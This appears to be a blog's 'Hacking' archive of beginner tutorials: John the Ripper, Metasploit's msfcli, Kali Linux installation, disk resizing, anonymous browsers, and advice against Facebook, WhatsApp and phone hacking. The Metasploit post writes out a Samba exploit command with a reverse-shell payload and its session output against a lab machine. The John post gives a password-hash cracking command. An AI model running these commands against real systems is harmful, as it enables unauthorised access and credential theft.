Category Archives: Hacking

How to use John the Ripper: Password cracker.

John the Ripper

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.

Many people are asking this question, “How can I crack any password”. But let me tell you that if you are reading this post don’t worry you are in a good place. In this article, we are going to dive into John the Ripper (JtR), you will see how it work and explain to you why it’s important to use it.

In the previous article, we have seen how to install and start with Kali Linux. Now in this article, we are going to see how to start with John the Ripper and to use it. Then first let us see what is John the Ripper.

What is John the Ripper?

First, you have to know that John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. It is designed to be both feature-rich and fast. It combines several cracking modes in one program and is fully configurable for your particular needs.

John the Ripper is available for several different platforms which enables you to use the same cracker everywhere. Also, It can support hundreds of hash and cipher types.

How can I get John the Ripper?

This is an amazing question that people may ask because after knowing what is John the Ripper, the next question must be how to get it. Now as you know what is John the Ripper let us see how to get it.

from John the Ripper official site

As I mentioned before John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product, please consider John the Ripper Pro, which is distributed primarily in the form of “native” packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.

Now, you can download John the Ripper on Linux, macOS, Windows, and Android on its official page Openwall.com/john. You must verify the authenticity and integrity of your John the Ripper downloads to make sure you downloaded a good one. Once you visit the official page you will get more information about that.

John the Ripper is available on Kali Linux as part of their password cracking metapackages.

You may also like how to install kali nethunter on android

What is John the Ripper is used for?

This is another question that some of you must ask, so let us respond to this question to satisfy everyone.

John the Ripper is a primary password cracker used during pen-testing exercises that can help IT guys spot weak passwords and poor password policies. It also supports several common encryption technologies for Unix and Windows-based Systems. It also autodetects the encryption on the hashed data.

John the Ripper also includes its own wordlists of common passwords for 20+ languages. John the RipperIs included in the pen-testing versions of Kali Linux.

Attack types

John the Ripper uses the dictionary attack. it takes text string samples from a wordlist. It offers also brute force attacks. In this type of attack John the Ripper goes through all the possible plaintext, hashing data, and then compares them to the input hash.

Also, it uses character frequency tables to try plaintext containing more frequently used characters first.

You may also like to see How to install Tool-X on termux

Some basic commands

Now we are going to go over some basics commands that you need to start using John the Ripper. To get started you need a file that contains a hash value to decrypt.

John usage example. (Tested in Kali Linux.)

Using a wordlist (–wordlist=/usr/share/john/password.lst), apply mangling rules(-rules) and attempt to crack the password hashes in the given file (unshadowed.txt).

root@kali:~# john --wordlist=/usr/share/john/password.lst --rules unshadowed.txt

Unique Usage Example

Using verbose mode (-v), read a list of passwords (-inp=allwords.txt) and save only unique words to a file (uniques.txt):

root@kali:~#  unique -v -inp=allwords.txt uniques.txt

This is the end of this article hope you get a clear understanding of John the Ripper. If you are having question or suggestion don’t keep it for your self just share with us Thank you.

Metasploit framework for hackers and pentesters guide

What is Metasploit?

The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.

Metasploit is one of the single most useful security auditing tools freely available to security professionals today, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.  

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics, and Reverse Engineering.

Kali Linux is developed, funded, and maintained by Offensive Security, a leading information security training company.

you may like also how to install kali Linux properly

what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The VM will run on any recent VMware products and other visualization technologies such as VirtualBox.

You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.

Metasploit Architecture

Metasploit is written in Ruby and has been in development for many years one can more easily understand the Metasploit architecture by taking a look under its hood.

In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the Metasploit-framework package and is installed in the /usr/share/Metasploit-framework directory, the top-level of which is shown below.

METASPLOIT OBJECT MODEL

In the Metasploit Framework, all modules are Ruby classes.

  • Modules inherit from the type-specific class
  • The type-specific class inherits from the Msf::Module class
  • There is a shared common API between modules

Payloads are slightly different.

  • Payloads are created at runtime from various components
  • Glue together stagers with stages

METASPLOIT INTERFACES

There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.

It is still beneficial, however, to be comfortable with all Metasploit interfaces.

you may want to install kali NetHunter on your android

What is the MSFcli?

The msfcli provides a powerful command-line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.

Command Line Interface Commands

For msfcli help: type msfcli –h.

help command msf

Note: when using msfcli, variables are assigned using the “equal to” operator = and that all options are case-sensitive.

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
       =[ svn r15767 updated today (2012.08.22)
RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.

root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

To display available payloads for the current module, append the letter P to the msfcli command line string.

root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Benefits of the MSFcli Interface

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.

It also doesn’t support any of the advanced automation features of msfconsole.

Closing words

congratulation you have reached the end hope now you know what Metasploit is. if you are having a question don’t keep it for yourself. Share with us. for more information go offensive security official page

How to protect Facebook account from hackers. Best technics

Did you know that most of Facebook account are been hacked by bad guys?

Facebook is a popular free social networking website that allows registered users to create profiles, upload photos, and videos, send messages and keep in touch with friends, family, and colleagues. The site, which is available in 37 different languages, includes public features such as:

  • Marketplace: it allows members to post, read and respond to classified ads.
  • Groups: it allows members who have common interests to find each other and interact.
  • Events: also allows members to publicize an event, invite guests and track who plans to attend.
  • Pages: it also, allows members to create and promote a public page built around a specific topic.
  • Presence technology – allows members to see which contacts are online and chat.

most Facebook accounts are hacked by bad guys who are looking for some information or just playing with hacking technics without even any profit on it. also, others are hacking Facebook account and appropriate your Facebook page if you are having more likes and followers for their future profit. so if you don’t want to be a future victim of Facebook account hackers, read this till the end.

Although Facebook is more secure there are some technics hackers are using to hack Facebook account like phishing, keylogging, Trojans/backdoors, Sniffing, Social Engineering, and Sessions Hijacking …

I also recommend you to read Technics used by hackers to hacker smartphone, and how to prevent

Facebook Security Features and Tips

Facebook is providing security features like login alerts and approvals, and review and update your Security Settings at any time.

Keep Your Account Secure

Then if you want to keep your account secure here are a few things you can do:

Protect your password

  • Don’t use your Facebook password anywhere else online, and never share it with other people. Make it secret.
  • Your password should be hard to guess, so don’t include your name or common words.
  • Try to mix uppercase, lowercase letters, and symbols to prevent brute force.

Also, you have to use a password that will be easy to you to remember but strong as mentioned above.

Never share your login information

  • Scammers may create fake websites that look like Facebook and ask you to login with your email and password. Don’t login on untrusted link shared.
  • Always check the website’s URL before you enter your login information. When in doubt, type www.facebook.com into your browser to get to Facebook.
  • Don’t forward emails from Facebook to other people, since they may have sensitive information about your account.
  • Learn more about avoiding phishing.

Log out of Facebook when you are sharing the same computer with someone.

Also it;s recommend to always log out your account if it’s not used on your one phone or pc. sometimes you can be using the friend phone, don’t forget to check if you really log out and delete all your information in that phone or pc.

Don’t accept friend requests from people you don’t know

  • Scammers may create fake accounts to friend people.
  • Becoming friends with scammers might allow them to spam your timeline, tag you in posts and send you malicious messages.

Keep your browser up to date

Also, you must keep your web browser up to date and remove suspicious applications or browser-add-ons

you may also like How to know if Your smartphone is Tapped or spyed

Never click suspicious links

  • This includes links on Facebook (example: on posts) or in emails.
  • Keep in mind that Facebook will never ask you for your password in an email.
  • If you see a suspicious link on Facebook, you can report it

Use Facebook extra security options

  • You can also get alerts about unrecognized logins, and set up two-factor authentication.
  • If you’re logged in to Facebook on a computer, you can use Security Checkup to review your security settings.

Note: This feature is currently available to people logged into Facebook on a computer or the latest version of Facebook for Android or Facebook for iOS app.

Note that also Facebook is using HTTPS, Secure browsing : (HTTPS) is a security feature that automatically encrypts your connection to Facebook. This helps protect your account by making it harder for anyone to access your Facebook information without your permission.

In addition, a secure connection is required to connect to Facebook and can’t be turned off.

Closing word

Congratulation you have reached the end of this post. Hope you have enjoyed it and you are now able to protect yourself against Scammers. If you are having any question or suggestion let us know

How to shrink disc in Kali Linux. professional way

Shrink a disc using Gparted

you may be in need of shrinking your disc for different purpose , either to do dual boot or something else. Kali Linux give you that opportunity to shrink your disc even if you are not a master Linux by using gparted.

If you are having Kali Linux installed on your computer or by booting into a live Kali Linux session with your chosen installation medium, we can resize the partition to our desired size, as the disk will not be in use because Kali Linux will all be in memory.

gparted in linux

Those who are not having kali Linux installed on their pc they can follow the first procedure.

To start resizing, make sure you insert your Kali Linux installation medium and power on the device. If needed, press any keyboard shortcuts for a “boot order menu” (depends on each manufacture eg:” F12, F9…”) or boot into BIOS/UEFI and change the boot order to point to the installation medium first.

When the boot menu/options appear, you should see at least one new option. Depending on the manufacture, hardware, how the system is configured, and install medium, you may see more options (e.g. Can you boot into non-UEFI?)

You may need to try a few different options in order to find success.

You should be greeted with the Kali Linux boot screen. Select Live, and You should be greeted with the Kali Linux boot screen. Select Live, and you should be booted into the Kali Linux default desktop.

boot kali

You may also like How to start with kali linux

Nb: Kali changed to a non-root user policy by default since the release of 2020.1.

This means: During the installation of amd64 and i386 images, it will prompt you for a standard user account to be created.

Any default operating system credentials used during Live Boot, or pre-created image (like Virtual Machines & ARM) will be:

Username : kali

Password: kali

GParted is the GNOME Partition Editor for creating, reorganizing, and deleting disk partitions. GParted enables you to change the partition organization while preserving the partition contents.

Now launch kali GParted, which we’ll use to shrink the disc.

gparted-tgeniusclub

See also how to install kali nethunter on android device

Once GParted has opened, select your kali Linux partition (/dev/sda1) or an other disc & resize it leaving enough space .

Nb: If you are moving past into any non-white in the partition then you are editing a section that is in use. Only remove from the area of the partition that is not in use.

Nb: If you wish to organize the partition to group all the Linux partitions together, placing the free space at the end, you may do so.

Set the space that you want to resize then press resize – kali linux

set the size with gparted

Once you have resized your partition, ensure you “Apply All Operations” on the hard disk. Exit kali Gparted and reboot.

closing word

Congratulation you have reached the end of our guide. now you are able to shrink you disc In case of any questions, don’t hesitate to post your comment below. Thanks.

How to install Kali Linux properly in 2021. The best way

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Also, it contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Also, it was released on the 13th March 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.

kali linux by offensive source kali.org

Offensive Security is the team behind Kali Linux, a Debian-based system. Kali is the preferred weapon of choice on Null Byte, and you can install it as your primary system (not recommended), use it with dual boot, install it in a virtual workstation, or create a portable live version on a USB flash drive.

Here, We’ll be walking you through a very basic installation today, just enough to get you up and running to follow along with Null Byte guides. There are actually many things that can be done to customize the installation, but we just want the quick-and-dirty process.

  • More than 600 penetration testing tools included
  • Free (as in beer) and always will be: Kali Linux, like BackTrack, is completely free of charge and always will be. You will never, ever have to pay for Kali Linux.
  • Open source Git tree: they are committed to the open source development model and their development tree is available for all to see. All of the source code which goes into Kali Linux is available for anyone who wants to tweak or rebuild packages to suit their specific needs.

Is Kali Linux Right For You?

As the distribution’s developers, you might expect us to recommend that everyone should be using Kali Linux. The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you’re unfamiliar with Linux.

Also, even for experienced Linux users, it can pose some challenges. Although Kali is an open source project, it’s not a wide-open source project, for reasons of security. The development team is small and trusted, packages in the repositories are signed both by the individual committer and the team, and importantly the set of upstream repositories from which updates and new packages are drawn is very small. Also, know that adding repositories to your software sources which have not been tested by the Kali Linux development team is a good way to cause problems on your system.

Also, if you are looking for a Linux distribution to learn the basics of Linux and need a good starting point, Kali is not the ideal distribution for you. You may want to begin with Ubuntu, Mint, or Debian instead.Also, if you’re interested in getting hands-on with the internals of Linux, take a look the Linux From Scratch project.

You may also like How to start with metasploit framework

What’s New in Kali Linux?

In Kali Linux version 2019.4, released at the end of 2019, Offensive Security made significant changes to how it looks and feels. And its 2020.1 update, released in January 2020, built upon the new foundation.

Perhaps the most significant update is the default desktop environment, which is now Xfce, a change that was made mostly for issues related to performance. Also, for most users, GNOME is overkill, and a lightweight desktop environment like Xfce provides lower overhead, leading to snappier and quicker performance. For all the die-hard GNOME fans out there, the previous desktop environment is still supported and even comes with an updated GTK3 theme.

Also, other new features include the introduction of undercover mode, new public packaging and documentation processes, an update to Kali NetHunter, the addition of PowerShell, non-root users are now the default, and other bug fixes and updates.

Which Image to Choose

choosing kali linux image

The Kali Linux download page offers three different image types (Installer, NetInstaller and Live) for download, each available for both 32-bit and 64-bit architectures.

If in doubt, use the “Installer” image. Also, you will need to check your system architecture to know weather to get 32-bit or 64-bit. If you don’t know it, you’re best to research how to find out (As a rule of thumb, if its older than 2005 you should be okay with amd64/x64/64-bit)

Installer

Is the recommended image to install Kali Linux. It contains a local copy of the (meta)packages listed (top10, default & large) so it can be used for complete offline installations without the need of a network connection.

Also, it cannot be used to boot a live system (such as directly running Kali from a USB). It is only an installer image.

NetInstaller

It can be used if you want the latest package every time you install Kali Linux or the standard installer image is too big to download. Also, this image is very small because it does not contain a local copy of (meta)packages to install. They will all be downloaded during installation, so as a result this requires a network connection which will slow down the installation time. Only use this image if you have reasons not to use the standard installer image above.

This image cannot be used to boot a live system (such as directly running Kali from a USB). It is only an installer image.

Live

This image is for running Kali Linux without installing it first so it is perfect for running off a USB stick (or a CD/DVD).

Also, you are able to install Kali Linux in its default configuration from this image but you will not be able to choose between desktop environments or to specify additional (meta)packages to install.

Then, if you want to run an older version of Kali, you can visit its index of older image versions. While Kali 2020.1 replaced root users with non-root users as the default, you may want to install the last 2019 version instead, which will still give you most of the newest features offered.

In this guide, Once you’ve decided how you want to run Kali, click the image name to download it. Also hit the “Torrent’ link instead if that will get the job done better.

Then, if you’re not sure of the architecture of the system you want to run Kali on, on Linux or macOS, you can run the command uname -m at the command line. Then, If you get the response, “x86_64”, use the 64-bit ISO image (the one containing “amd64” in the file name); if you get “i386”, use the 32-bit image (the one containing “i386” in the file name). If you’re on a Windows system, the procedure for determining whether your architecture is detailed on Microsoft’s website .

IMPORTANT! Never download Kali Linux images from anywhere other than the official sources. Also, Always be sure to verify the SHA256 checksums of the file you’ve downloaded against our official values . It would be easy for a malicious entity to modify a Kali installation to contain exploits or malware and host it unofficially.

Installing Kali Linux

The process for installing Kali Linux will be different depending on what version you chose. Also, for help on installing Live images, you can also find some help, as well as Kali’s own documentation.

Installing Kali Linux (Single boot) on your computer is an easy process. This guide will cover the basic install (which can be done on bare metal or guest VM), with the option of encrypting the partition. You should be able to use Kali Linux on newer hardware with UEFI and older systems with BIOS.

You may also like How to shrink a disc in kali linux

System Requirements

Also, you must know that, the installation requirements for Kali Linux will vary depending on what you would like to install and your setup. For system requirements:

  • On the low end, you can set up Kali Linux as a basic Secure Shell (SSH) server with no desktop, using as little as 128 MB of RAM (512 MB recommended) and 2 GB of disk space.
  • On the higher end, if you opt to install the default Xfce4 desktop and the kali-linux-default metapackage, you should really aim for at least 2048 MB of RAM and 20 GB of disk space.

Installation Prerequisites

This guide will make also the following assumptions when installing Kali Linux:

  • Using the amd64 installer image.
  • CD/DVD drive / USB boot support.
  • Single disk to install to.
  • Connected to a network (with DHCP & DNS enabled) which has outbound Internet access.

Nb: We will be wiping any existing data on the hard disk, so please backup any important information on the device to an external media.


Preparing for the Installation

  1. Download Kali Linux (Installer is recommended).
  2. Burn The Kali Linux ISO to DVD or image Kali Linux Live to USB drive.
  3. Backup any important information on the device to an external media.
  4. Ensure that your computer is set to boot from CD/DVD/USB in your BIOS/UEFI.

Installation Procedure

1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali Linux Boot screen. Choose either Graphical install or Install (Text-Mode). In this example, we chose the Graphical install.

boot kali. source from kali.org

2. Then select your preferred language. Also, This will be used for both the setup process and once you are using Kali Linux.

source from kali.org

3. Next, specify your geographic location.

source from kali.org

4. Then select your keyboard layout.

source from kali.org

5. Then the setup will now probe your network interfaces, looks for a DHCP service, and then prompt you to enter a hostname for your system. In the example below, we’ve entered kali as our hostname.

If there is no network access with DHCP service detected, you may need to manually configure the network information or do not configure the network at this time.

  • If there isn’t a DHCP service running on the network, it will ask you to manually enter the network information after probing for network interfaces, or you can skip.
  • If Kali Linux doesn’t detect your NIC, you either need to include the drivers for it when prompted, or generate a custom Kali Linux ISO with them pre-included.
  • If the setup detects multiple NICs, it may prompt you which one to use for the install.
  • If the chosen NIC is 802.11 based, you will be asked for your wireless network information before being prompted for a hostname.
source from kali.org

6. Also, you may optionally provide a default domain name for this system to use (values may be pulled in from DHCP or if there is an existing operating systems pre-existing).

source from kali.org

7. Next, create the user account for the system (Full name, username and a strong password).

source from kali.org

7. a. You can create a username of your choice

source from kali.org

7. b. You must also create a Strong password. Make sure you create a strong password to protect your kali

source from kali.org

8. Then set your time zone.

source from kali.org

9. Next the installer will now probe your disks and offer you various choices, depending on the setup. Also, in this guide, we are using a clean disk, so we have four options to pick from. We will select Guided – the entire disk, as this is the single boot installation for Kali Linux, so we do not want any other operating systems installed, so we are happy to wipe the disk.

source from kali.org

If there is an pre-existing data on the disk, you will have have an extra option (Guided – use the largest continuous free space) . This would instruct the setup not to alter any existing data, which is perfect for for dual-booting into another operating system. As this is not the case in this example, it is not visible.

Experienced users can use the “Manual” partitioning method for more granular configuration options, which is covered more in our BTRFS guide.

10. Then select the disk to be partitioned.

source from kali.org

11. Additionaly, depending on your needs, you can choose to keep all your files in a single partition, “the default”, or to have separate partitions for one or more of the top-level directories. Also, If you’re not sure which you want, you want “All files in one partition“.

source from kali.org

11. a.Next we finalize partitioning

source from kali.org

12. Also, you’ll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you’ll have an almost finished installation.

source from kali.org

13. Kali Linux uses a central repository to distribute applications. You’ll need to enter any appropriate proxy information as needed.

source from kali.org

14. Here you can select which metapackages you would like to install. The default selections will install a standard Kali Linux system and you don’t really have to change anything here. Please refer to this guide if you prefer to change the default selections.

source from kali.org

15. Next confirm to install the GRUB boot loader.

source from kali.org

16. Here you Select the hard drive to install the GRUB bootloader in (it does not by default select any drive).

source from kali.org

17. Finally, click Continue to reboot into your new Kali Linux installation.

source from kali.org

closing word

Congratulation you have reached the end of our guide. now you are able to install properly kali linux In case of any questions, don’t hesitate to post your comment below. for more details go on kali.org Thanks.

How hackers hack whatsapp account: new technic in 2021

How they do to hack whatsapp?

WhatsApp is a free, multiplatform messaging app that lets you make video and voice calls, send text messages, and more all with just a Wi-Fi connection or other. 

Then to access totally whatsapp account the only information needed to connect to someone’s whatsapp account is a valid phone number and verification code.

who would have thought that the way of logging into whatsapp accounts could be misused to hack user data without their knowledge?

How they do to hack whatsapp?

The first thing hackers do to hack whatsapp they send you a message that showed you that they did mistake.

so if you receive a message on your phone explaining that an error has been made that you received a message containing a code from another person allowing them to connect to whatsapp, do not disclose this code!

NB: they can use different attractive message, to let you send them the confirmation message

Also anyone who has access to this code, along with your phone number, could enter your account, and block you in such a way that you can no longer access it.

you may like also to see how to protect Facebook from hackers

How does it work?

Of course, the only information needed to connect to someone’s WhatsApp account is a valid phone number and a verification code that you will receive at this number by SMS used to verify the authenticity of the person wishing to connect. for more information how whatsapp work.

Unfortunately, some people have decided to take advantage of this ease of use against WhatsApp’s users.

all they need to know is the phone number of their potential victim.

and by registering on the application with this phone number that does not belong to them.

Then these same people cannot access the accounts without the access code which was sent to the phone of the victims. Then, the victims receive the following message:

whatsapp verfication code

“Hey, I accidentally sent a WhatsApp verification code to your phone. Can you send it to me?”.

it can be any message to ask you a message received.

If a victim responds to this message with the code they received by text message, the perpetrators are in possession of the victim’s telephone number, and also of the identity verification code.

In other words, they have it all. at that time they become the owner of your WhatsApp accounts.

A tip, as WhatsApp specifies in its terms of use : Never disclose this code to anyone.

You should never share your WhatsApp verification code with others. If someone is trying to take over your account, they need the SMS verification code sent to your phone number to do so.

Without this code, any user attempting to verify your number can’t complete the verification process and use your phone number on WhatsApp. This means you remain in control of your WhatsApp account.”

WhatsApp doesn’t have sufficient information to identify the individual who is attempting to verify your WhatsApp account.

So be careful – the security and the use of your WhatsApp account depends on it!

online privacy | 6 best anonymous Browsers

Why should you start using anonymous browsers instead of regular ones?

Privacy is the ability of an individual or group to seclude themselves or information about themselves and thereby express themselves selectively.

When something is private to a person, it usually means that something is inherently special or sensitive to them. The domain of privacy partially overlaps with security, which can include the concepts of appropriate use, as well as protection of information.

Protection of online privacy with 6 best anonymous Browsers

You may ask yourself why should i start using anonymous browsers instead of regular ones?

You may found that the answer is clear, these days on the internet nothing is private, in fact many websites are providing online privacy but is a joke and our private browsing data has been using for business purposes like advertising. We are been tracked by Google, by our government and many of data collectors.

It’s easy to know what we are doing online, which websites are we visiting. They collect all these information and use them against us it can be in present or in future. But the hard truth is that it’s some how impossible to be fully anonymous.

But we can reduce the impact to some extent by following some quick measures that will diminish leaked information footprint and (almost) secure our online privacy. In this article, we are going to list a similar measure to protect your browsing data.

These anonymous browsers that we are going to see are powerful in term of security and privacy than regular ones.

These secure browsers will prevent somebody watching your internet connection from learning what sites you visit, it stops sites you visit from learning your physical location and lets you access sites which are blocked.

Anonymous Browsers :

1. Tor Browser – privacy

tor browser

Tor browser is the best powerful anonymous browser is completely free and open-source software built around onion routing. The privacy browser Tor protects you by sending your internet traffic and communications around a distributed network of relays run by volunteers all around the world.

Like instead of directing traffic from A to B, the Tor browser actually bounces it multiple times through different locations. In this way, no one could possibly tell where the traffic originated or where it’s going.

You may also like how to be anonymous on the internet using tor browser

However many government organizations use the Tor browser to gather intelligence and visit the darknet or other websites without leaving any digital footprints or government IP addresses in the site’s log makes Tor one of the most secure web browsers and best open-source alternative to Google Chrome.

In addition, when it comes to other benefits, know that Tor helps you visit websites that might be blocked in your country.

tor browser overview

In case if you want to know more about Tor Browser, visit the official website

2. Epic Browser – privacy

epic browser

Epic Browser is a chromium-based anonymous web browser that comes with the ability to stops 600+ tracking attempts in an average browsing session. It restricts websites from showing ads, fingerprinting, crypto-mining, ultrasound signalling and more.

only when you’re using Epic with encrypted proxy on, your data is encrypted and hidden from the government, from your ISP, from Google and from hundreds of data collectors. And when you close it after internet surfing, it automatically deletes the browsing history, cookies, web cache, databases, web, Flash & Silver-light cookies — literally everything that compromises your privacy.

In addition, it encrypts your data and hidden from the government, from google and from many data collectors when you are using it with encrypted proxy. When it is closed after internet surfing.

epic browser overview

In case if you want to know more about Epic Browser, visit the official website

you may also like to know about how to start with metasploit

3. Comodo Dragon / Ice Dragon

comodo dragon/ iceDragon browser

Comodo created two flavors of anonymous browsers. One named Comodo Dragon — is also a Chromium-based secure web browser like Epic, it comes with all of Chrome’s features plus the unparalleled level of security and privacy.

And the other named Comodo IceDragon — is a fast and versatile Internet browser based on Mozilla Firefox which features several security, performance and feature enhancements over the core build. Fully compatible with Firefox plug-ins and extensions, IceDragon combines the freedom and functionality of Firefox with the unparalleled security and privacy of Comodo.

Comodo Dragon and Ice Dragon privacy web browsers possess top-level security features to anonymize your browsing data from the third party.

comodo overview

In case if you want to know more about Comodo Dragon / Ice Dragon, visit the official website

4. Brave Browser -privacy

brave browser

Brave Browser protects you against ads and trackers ads . Then, it blocks any cookies other than those absolutely needed. It also isolates each tab so that websites can’t communicate.

You also get protection against malicious code and malicious sites, especially those related to cryptocurrency mining. And if you need an extra layer of privacy, Brave allows you to take part in a Tor network (instead of offering the traditional “Incognito” mode).

BRAVE SHIELDS FOR PRIVACY

Block data-grabbing ads and trackers

The vast bulk of websites and ads include software that tries to identify you. They want to track your every move across the web. Brave blocks all this, allowing you to browse freely.

brave overview

In case if you want to know more about Brave, visit the official website

5. Waterfox

Waterfox browser

Waterfox was started back in March 2011 by myself (Alex Kontos), a 16 year old student. Is based on Mozilla’s free and open source platform.

as well as Waterfox was one of the first widely distributed 64-Bit browsers on the web and quickly gained a loyal following. At a time it had one thing in mind: speed, but now it also attempts to be an ethical, user-oriented browser.

It focuses on giving users choice. The browser is focused on power users, which lets you make the important decisions.

There is no plugin whitelist (meaning you can run Java Applets and Silverlight apps), you can run whichever extensions you like (including bootstrapped add-ons that can completely change functionality of the browser) and absolutely no data or telemetry is sent back to Mozilla or the Waterfox project.

We recommend this Web browser to both regular and more advanced users. That’s because Waterfox comes equipped with everything you could possibly need without installing add-ons or extensions of any kind.

waterfox overview

6. Iron Browser

Iron browser

Our list of the best anonymous browsers wouldn’t be complete without Iron. This one is designed for long-term Chrome users looking for a way to get away from Google.

Iron depends on Chromium reason why it looks very similar to Chrome. However, this browser has eliminated pretty much all types of Google-related tracking.

We are talking about Chrome features such as Installation-ID, Suggest, Alternate Error Pages, Error Reporting, RLZ-Tracking, and URL-tracking. We should also mention that Iron is under active development.

Iron browser overview

closing note

Congratulation you have reached the end of our guide to the protection online privacy with 6 anonymous browsers In case of any questions, don’t hesitate to post your comment below. Thanks. you may want to see also privacy with browser

Techniques Hackers use To Hack Smartphones. How to prevent?

How to prevent smartphones attacks?

The world with advanced technology has become great and sometimes harmful. At the end of the day, everything is hackable. What I am surprised about is that people sometimes forget that it’s so easy to hack into their devices. Said Adi Sharabani, the co-founder of mobile security company Skycure, who used to work for Israeli Intelligence.

Hackers can get into your phone without even your knowledge. Human vulnerabilities are giving hackers access to many devices without touching the victim’s device. Day and night, smartphone brand providers are working on how to secure their provided smartphones in such a way that hackers are also testing vulnerabilities day and night.

Also, the threat of having your phone hacked has become a common and rational fear. The cold, hard truth is that it is now possible to hack any phone.

With the advancement of technology, where the discovery of knowledge and information advances the understanding of technology, hackers are able to hack even some of the most sophisticated phone software.

Hacking technics

Unfortunately, there are many hackers with malicious intent that can and do break into an Android device to steal valuable personal information or profit from illegal financial transactions. While it may be hard (or even impossible) to make your Android unhackable, there are things you can do to make your device more secure.

We wrote a blog post for you to know if your smartphone is tapped or spied

Example of hacking attacks

  • Malware attack
  • Phishing attack
  • SQL Injection Attack
  • Cross-Site Scripting (XSS)
  • Denial of Service (DoS)
  • Session Hijacking and Man-in-the-Middle Attacks
  • Credential Reuse

Malware

If you’ve ever seen an antivirus alert pop up on your screen, or if you’ve mistakenly clicked a malicious email attachment, then you’ve had a close call with malware. Attackers love to use malware to gain a foothold on users’ computers and, consequently, the offices they work in because it can be so effective.

In the same way, attackers will use a variety of methods to get malware into your computer, but at some stage, it often requires the user to take some action to install the malware.

As well, this can include clicking a link to download a file, or opening an attachment that may look harmless (like a Word document or PDF attachment), but actually has a malware installer hidden within.

Phishing attack

When an attacker wants you to install malware or divulge sensitive information, they often turn to phishing tactics, or pretending to be someone or something else to get you to take an action you normally wouldn’t. Since they rely on human curiosity and impulses, phishing attacks can be difficult to stop.

So, in a phishing attack, an attacker may email you that appears to be from someone you trust, like your boss or a company you do business with. The email will seem legitimate, and it will have some urgency to it (e.g., fraudulent activity has been detected on your account).

In the email, there will be an attachment to open or a link to click. Upon opening the malicious attachment, you’ll thereby install the malware on your device.

If you click the link, it may send you to a legitimate-looking website that asks for you to log in to access an important file. Except the website is actually a trap used to capture your credentials when you try to log in.

To reduce the risk of being phished, you can use these techniques:

  • Critical thinking: do not accept that an email is the real deal just because you’re busy or stressed, or you have 150 other unread messages in your inbox. Stop for a minute and analyze the email.
  • Hovering over the links: Move your mouse over the link, but do not click it! Just let your mouse cursor hover the link and see where you would actually take you. Apply critical thinking to decipher the URL.
  • Analyzing email headers: Email headers define how an email got to your address. The “Reply-to” and “Return-Path” parameters should lead to the same domain as is stated in the email.
  • Sandboxing :You can test email content in a sandbox environment, logging activity from opening the attachment or clicking the links inside the email.

Hacking Software

Did you know that hacking software for Android and other mobile devices exists? And did you know there are countless hacking software options online for free? Hacking software is a method used by hackers to get information from a phone.

Despite the price of hacking software, serious hackers can buy hacking software anywhere, such as a phone spy app, which must be installed on the target phone. Not all hackers need to handle the victim phone physically to install hacking software. But in some cases, they must.

Keyloggers are a type of monitoring software designed to record keystrokes made by a user. One of the most traditional types of cyber threat, these keystroke loggers record the information you type into a website or application and send it back to a third party.

